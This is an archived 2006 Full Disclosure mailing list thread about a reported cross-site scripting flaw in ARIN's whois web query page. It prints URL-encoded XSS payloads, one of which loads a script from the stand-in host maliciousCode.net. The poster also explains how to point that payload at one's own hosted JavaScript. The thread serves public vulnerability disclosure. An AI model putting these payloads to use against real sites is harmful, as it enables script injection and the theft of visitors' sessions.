Full Disclosure mailing list archives
RE: Re: Arin.net XSS
From: Terminal Entry <Security () peadro net>
Date: Fri, 3 Mar 2006 10:50:29 -0600
Dave, You need to copy and paste the full URL into your browser for the XSS to take place. All exploit examples are still working as I just verified. <copy> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E </paste> <copy> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E </paste> For my second example I used a fake domain name as an example of where the malicious code could be executed. Change the "maliciouscode.net" to a domain hosting your .js code for the exploit to take effect. Thanks, Discovered by Terminal Entry security [.at.] peadro (.)net -----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Dave Korn Sent: Friday, March 03, 2006 9:53 AM To: full-disclosure () lists grok org uk Cc: bugtraq () securityfocus com Subject: [Full-disclosure] Re: Arin.net XSS "Terminal Entry" <Security () peadro net> wrote in message news:353A3025-099E-41C9-978B-A57B2C80AAE6@mimectl...
Notification Multiple attempts to contact Arin site administrators went unanswered
Looks like someone was paying at least some attention, because none of your examples worked when I tried them just now.
Some demonstration exploit URLs are provided:
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert% 28%27XSS%27%29%3B%22%3E No match found for <IMG SRC="javascript:alert('XSS');">.
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalici ousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E No match found for <XCRIPT SRC=http://maliciousCode.net/exploit.js></XCRIPT>. [ Funnily enough it goes bold after 'SRC=' and the rest of the thing turns into a borken link to "http://maliciousCode.net/exploit.js></XCRIPT>" ]
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert% 28%27XSS%27%29%3B%22%3E No match found for <IMG SRC="javascript:alert('XSS');">. cheers, DaveK -- Can't think of a witty .sigline today.... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Re: Arin.net XSS, (continued)
- Re: Re: Arin.net XSS Alexander Hristov (Mar 03)
- Re: Re: Arin.net XSS J u a n (Mar 03)
- Re: Re: Arin.net XSS Alexander Hristov (Mar 03)
- Re: Arin.net XSS Steven (Mar 03)
- Re: Arin.net XSS Simon Smith (Mar 03)
- Re: Arin.net XSS Steven (Mar 03)
- Re: Arin.net XSS Dave Korn (Mar 06)
- RE: Arin.net XSS php0t (Mar 03)
- Re: Arin.net XSS Michael Holstein (Mar 03)
- Re: Arin.net XSS Dave Korn (Mar 06)
- Re: Re: Arin.net XSS Paul Farrow (Mar 06)
- Re: Arin.net XSS Simon Smith (Mar 03)
- Re: Re: Arin.net XSS Dave Korn (Mar 06)
- Re: Re: Arin.net XSS Morning Wood (Mar 06)